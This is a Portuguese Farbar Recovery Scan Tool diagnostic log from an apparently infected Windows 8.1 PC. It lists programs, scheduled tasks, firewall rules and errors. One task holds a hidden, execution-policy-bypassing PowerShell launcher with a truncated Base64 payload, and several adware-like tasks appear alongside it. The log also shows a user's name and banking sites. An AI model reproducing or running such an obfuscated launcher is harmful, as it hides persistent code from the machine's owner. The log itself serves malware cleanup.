cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:05-03-2016 01
Executado por Alice Carolina (2016-03-07 17:02:07)
Executando a partir de C:\Users\Alice Carolina\Desktop
Windows 8.1 Pro (X64) (2014-10-21 01:29:40)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-3161854369-2407533720-2015392319-500 - Administrator - Disabled)
Alice Carolina (S-1-5-21-3161854369-2407533720-2015392319-1004 - Administrator - Enabled) => C:\Users\Alice Carolina
Convidado (S-1-5-21-3161854369-2407533720-2015392319-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3161854369-2407533720-2015392319-1003 - Limited - Enabled)

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.)
4500_G510af_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
4500G510af (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
4500G510af_Software_Min (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.1.2253 - AVAST Software)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0115 - Disc Soft Ltd)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Fax (x32 Version: 140.0.307.000 - Hewlett-Packard) Hidden
Freemake Video Converter versão 4.1.6 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.6 - Ellora Assets Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Guitar Pro 5.2 (HKLM-x32\...\Guitar Pro 5_is1) (Version: - Arobas Music)
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Officejet 4500 G510a-f 14.0 Rel. 6 (HKLM\...\{A49C5804-8F24-433C-99B2-9F9F541090C7}) (Version: 14.0 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle)
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 41.0.2 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 pt-BR)) (Version: 41.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.2 - Mozilla)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\Spotify) (Version: 1.0.24.104.g92a22684 - Spotify AB)
Stardock Start8 (HKLM\...\Start8_is1) (Version: 1.40.1 - Stardock Software, Inc.)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.PROPLUS_{2BA6245D-FBB9-42F6-AFD9-C0DC52763AD5}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.2 - VideoLAN)
Warsaw 1.8.0.10356 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.8.0.10356 - GAS Tecnologia)
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {055B2B04-DD2F-48D9-B5B2-F6D1DF2C5D6A} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {0638687D-EE37-4925-822F-925EAB17B76A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-14] (Microsoft Corporation)
Task: {2A87A242-7086-4299-BF26-A25D05D3A513} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {2E977C6D-607A-4859-B934-4EF45252BD20} - System32\Tasks\SPDriver => C:\Program Files (x86)\ShopperPro3\JSDriver\Unknown\jsdrv.exe <==== ATENÇÃO
Task: {6437E56C-65F2-4524-808A-73FD3963CE87} - \WPD\SqmUpload_S-1-5-21-3161854369-2407533720-2015392319-1001 -> Nenhum Arquivo <==== ATENÇÃO
Task: {677073D0-AC15-47FE-9DFA-41D472B919EE} - \Optimize Start Menu Cache Files-S-1-5-21-3161854369-2407533720-2015392319-1001 -> Nenhum Arquivo <==== ATENÇÃO
Task: {84F64767-177C-4C72-9C2A-03F8D9D9A397} - System32\Tasks\{0E0B0947-7D0B-0509-0511-7A7D0D081104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAIAAgACAAIAA7ACAAOwA7ACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUA (a entrada de dados tem 9420 mais caracteres).
Task: {8E2B2305-9A17-4DAC-9C54-C20277E9D14E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {972CC6DF-7DC7-4879-B265-E323B357D4B9} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-03-07] (AVAST Software)
Task: {B480721F-44DA-4467-9090-EEEAA4C03BD4} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-03-07] (AVAST Software)
Task: {B7A535A1-4A13-4A07-B575-891F696CFC2C} - System32\Tasks\Pritc => C:\Users\Alice Carolina\AppData\Local\Temp\is-7L49M.tmp\print.exe [2016-03-03] (VLOME) <==== ATENÇÃO
Task: {C6AA24D0-27FC-48A0-ADC7-5DB46B907805} - System32\Tasks\DNS Monitoring => C:\Windows\system32\regsvr32.exe [2014-10-28] (Microsoft Corporation)
Task: {C72C65B8-9ED2-4DDA-95A9-2D560643AA99} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-02-09] ()
Task: {CEF751B2-CD90-497C-A040-E7D99A6668D6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {D0BD073B-C4DC-4D46-BFA1-C2B33AE8FC28} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {E47017ED-3921-47E2-9235-7F6A27DED38A} - System32\Tasks\{C1FB7BB3-A511-4593-8471-B4909CBA5E3C} => pcalua.exe -a D:\DirectX\dxsetup.exe -d D:\DirectX
Task: {E8770F09-A263-403B-90E5-B4FB9E70F637} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {EA6359C1-A298-44E8-AA1C-480A81FD313B} - System32\Tasks\Eograaavamkse => C:\ProgramData\Eograaavamkse\1.0.7.1\ihoedroe.exe [2016-03-07] ()
Task: {EF26222B-655B-4E93-BC24-FC8619F586EA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

==================== Módulos Carregados (Whitelisted) ==============

2016-03-06 23:47 - 2016-03-07 17:02 - 00284160 _____ () C:\Program Files (x86)\68317320-1457318624-11E0-BC93-14DAE9B8CC23\jnsl8E97.tmp
2016-03-07 03:02 - 2016-03-07 03:02 - 00341504 _____ () C:\Program Files (x86)\68317320-1457318624-11E0-BC93-14DAE9B8CC23\knsk3FE2.tmp
2016-03-06 23:48 - 2016-03-07 17:02 - 00416256 _____ () C:\Program Files (x86)\68317320-1457318624-11E0-BC93-14DAE9B8CC23\hnsyAEF2.tmp
2016-03-07 16:24 - 2016-03-07 16:24 - 00113496 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-03-07 16:23 - 2016-03-07 16:23 - 00133768 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-03-07 16:26 - 2016-03-07 16:26 - 02990080 _____ () C:\Program Files\AVAST Software\Avast\defs\15110499\algo.dll
2016-03-07 16:24 - 2016-03-07 16:24 - 00480760 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-03-07 16:24 - 2016-03-07 16:24 - 00307808 _____ () C:\Program Files\AVAST Software\Avast\browser_pass.dll
2016-03-07 16:41 - 2016-03-07 16:41 - 02838016 _____ () C:\Program Files\AVAST Software\Avast\defs\16030700\algo.dll
2016-03-07 16:24 - 2016-03-07 16:25 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2015-04-10 22:02 - 2014-02-10 11:44 - 04592128 _____ () C:\Users\Alice Carolina\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libglesv2.dll
2015-04-10 22:02 - 2014-02-10 11:44 - 00112128 _____ () C:\Users\Alice Carolina\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [762]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\google.com -> www.google.com
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\google.com.br -> www.google.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itau.b.br -> www.itau.b.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itau.com.br -> hxxps://bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itau.com.br -> bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itaupersonnalite.com.br -> hxxp://www.itaupersonnalite.com.br
IE trusted site: HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\...\itaupersonnalite.com.br -> www.itaupersonnalite.com.br

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2016-03-07 12:16 - 2016-03-06 23:39 - 00000967 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-3161854369-2407533720-2015392319-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\Alice Carolina\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "YTDownloader"

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{B7ED2A7B-DB38-455D-A758-FD30576D911E}] => (Allow) C:\Users\Alice Carolina\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5373262F-65C1-48D2-9ECD-45D646414854}] => (Allow) C:\Users\Alice Carolina\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1A4E86D8-9AFA-4EA4-B08B-7CFF795B2502}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{EFEA9D13-E341-4A50-A8BA-1B9DA9D16DCD}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{5C85A128-636C-45EB-93CC-DA4640F79CF1}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{54FE10D2-6471-4A42-B49C-E36620DD275E}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{297414A0-5766-4C86-A905-8F5FC75D1AE7}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{ED6E3D40-820A-49BC-A47F-6DF9BB7BFF28}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{A00A9A3B-27B2-4A3C-A7D5-DDD98F57AD3A}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{0A363C08-0493-43B7-8474-7A4B5043F7F2}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{C03F7F8C-077E-4BE5-8BDA-11E4294AB72A}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{33F46763-278D-4CE6-9281-7E46E7642A30}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [TCP Query User{03BE0B3D-5683-4F0E-B689-B3306AC8520D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{1461E9D7-332C-4356-BE75-8DCB99E16247}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{0F896D10-DF3E-47EA-944A-0984507614CB}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{A19ECD6E-4657-4A14-AA38-32E1BC1222F6}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{632F53F0-DE0E-4C62-A242-373A70A79D97}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{67B530E3-3383-497E-9ADA-E03FD9339A91}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{6DBC19D4-474C-4D00-804E-E4C67B82F85C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{D0D24A49-0018-4F14-BBFD-98196873C262}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{EACC910D-2838-4569-9D3E-089BBD690D56}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{D9D3D0F4-7CBC-4217-9528-064D8D8DCA82}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{73467799-CC1A-4ED5-AB19-4F4BFF63BB61}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{F4DCB06D-7EDA-4BEE-AF8B-041DE93E8F6E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{26A6E861-85DD-4AA4-A295-C2A874C388AC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{B8D1BBDA-BC3B-497D-99B7-50DE43BDEE31}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{2D5D9143-25D7-4C98-9B1F-4434AB0AC87F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{A6AC1250-4024-451C-AF98-61E7BB044DEE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{25443120-345E-4FD6-A033-DEE2436B9CDA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{50A5D97F-A773-41AC-A79C-990C9B178528}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{0614BF30-1501-4C1C-B08A-D6E901CC61BC}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{B4301FBB-7C77-4DD8-8FBD-81D898CC67D8}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{E74D1779-02C1-49E1-9D08-12744B48AE49}] => (Allow) C:\Windows\SysWOW64\lxczcoms.exe
FirewallRules: [{ADCC2559-D61C-4ED6-8856-9B8297CF80D0}] => (Allow) C:\Windows\SysWOW64\lxczcoms.exe
FirewallRules: [{DA1C89F4-498A-43A3-9C77-9E1BA93165B4}] => (Allow) C:\Windows\System32\lxczcoms.exe
FirewallRules: [{65792788-6AA8-4127-8438-4EC9F93D404E}] => (Allow) C:\Windows\System32\lxczcoms.exe
FirewallRules: [{33E28C64-3C0E-4BB1-A226-847CF426F254}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3D7AFDA6-07D3-44EF-89B1-DB26A82EB14A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{C3B7B762-B51C-41CC-97FF-D973EE0E654B}C:\users\alice carolina\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7E539DA5-C5ED-4B3B-A7DA-CE69BEB07E26}C:\users\alice carolina\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [{AD1DDAA3-CFBC-4900-8609-DCDF90BEE3FF}] => (Block) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E3AFAF28-445A-4475-8023-FC473055607D}] => (Block) C:\users\alice carolina\appdata\roaming\spotify\spotify.exe
FirewallRules: [{C10932F5-AC67-4B98-B8B7-2BCBA60DD5FF}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{3E11B389-C0B8-4858-AC7C-8E3E6D50AA0B}C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe] => (Allow) C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe
FirewallRules: [UDP Query User{D45874A1-59EC-4043-AEA7-01270B400226}C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe] => (Allow) C:\users\alice carolina\downloads\medal of honor allied assault\mohaa.exe
FirewallRules: [TCP Query User{604BA05C-1ECE-449B-A609-819B1E6BF98C}C:\windows\syswow64\lxczcoms.exe] => (Allow) C:\windows\syswow64\lxczcoms.exe
FirewallRules: [UDP Query User{1075F385-03C1-4D44-8BED-26F0A90230B3}C:\windows\syswow64\lxczcoms.exe] => (Allow) C:\windows\syswow64\lxczcoms.exe

==================== Pontos de Restauração =========================

26-02-2016 20:01:35 DirectX 9.0 instalado
06-03-2016 18:10:05 Ponto de Verificação Agendado

==================== Dispositivos Apresentando Falhas No Gerenciador =============


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (03/07/2016 03:49:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORIDADE NT)
Description: Falha ao descarregar as cadeias de caracteres do contador de desempenho do serviço WmiApRpl (WmiApRpl). O primeiro DWORD da seção de dados contém o código de erro.

Error: (03/07/2016 03:49:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORIDADE NT)
Description: As cadeias de caracteres de desempenho no valor do Registro de desempenho foram corrompidas durante o processamento do provedor do contador de extensões Performance. O valor BaseIndex do Registro de desempenho é o primeiro DWORD na seção de dados, o valor LastCounter é o segundo DWORD na seção de dados e o valor LastHelp é o terceiro DWORD na seção de dados.

Error: (03/07/2016 03:49:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORIDADE NT)
Description: As cadeias de caracteres de desempenho no valor do Registro de desempenho foram corrompidas durante o processamento do provedor do contador de extensões Performance. O valor BaseIndex do Registro de desempenho é o primeiro DWORD na seção de dados, o valor LastCounter é o segundo DWORD na seção de dados e o valor LastHelp é o terceiro DWORD na seção de dados.

Error: (03/07/2016 01:10:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Nome do módulo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000003f81
ID do processo com falha: 0xeb0
Hora de início do aplicativo com falha: 0xspbia.exe0
Caminho do aplicativo com falha: spbia.exe1
Caminho do módulo com falha: spbia.exe2
ID do Relatório: spbia.exe3
Nome completo do pacote com falha: spbia.exe4
ID do aplicativo relativo ao pacote com falha: spbia.exe5

Error: (03/07/2016 12:55:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Nome do módulo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000003f81
ID do processo com falha: 0xf48
Hora de início do aplicativo com falha: 0xspbia.exe0
Caminho do aplicativo com falha: spbia.exe1
Caminho do módulo com falha: spbia.exe2
ID do Relatório: spbia.exe3
Nome completo do pacote com falha: spbia.exe4
ID do aplicativo relativo ao pacote com falha: spbia.exe5

Error: (03/07/2016 12:21:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: chrome.exe, versão: 48.0.2564.116, carimbo de data/hora: 0x56c52f1d
Nome do módulo com falha: UGProBro.dll_unloaded, versão: 1.5.36.16098, carimbo de data/hora: 0x56b07335
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0001dc73
ID do processo com falha: 0xd68
Hora de início do aplicativo com falha: 0xchrome.exe0
Caminho do aplicativo com falha: chrome.exe1
Caminho do módulo com falha: chrome.exe2
ID do Relatório: chrome.exe3
Nome completo do pacote com falha: chrome.exe4
ID do aplicativo relativo ao pacote com falha: chrome.exe5

Error: (03/07/2016 12:20:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: chrome.exe, versão: 48.0.2564.116, carimbo de data/hora: 0x56c52f1d
Nome do módulo com falha: UGProBro.dll_unloaded, versão: 1.5.36.16098, carimbo de data/hora: 0x56b07335
Código de exceção: 0xc00001a5
Deslocamento da falha: 0x0003a27c
ID do processo com falha: 0xd68
Hora de início do aplicativo com falha: 0xchrome.exe0
Caminho do aplicativo com falha: chrome.exe1
Caminho do módulo com falha: chrome.exe2
ID do Relatório: chrome.exe3
Nome completo do pacote com falha: chrome.exe4
ID do aplicativo relativo ao pacote com falha: chrome.exe5

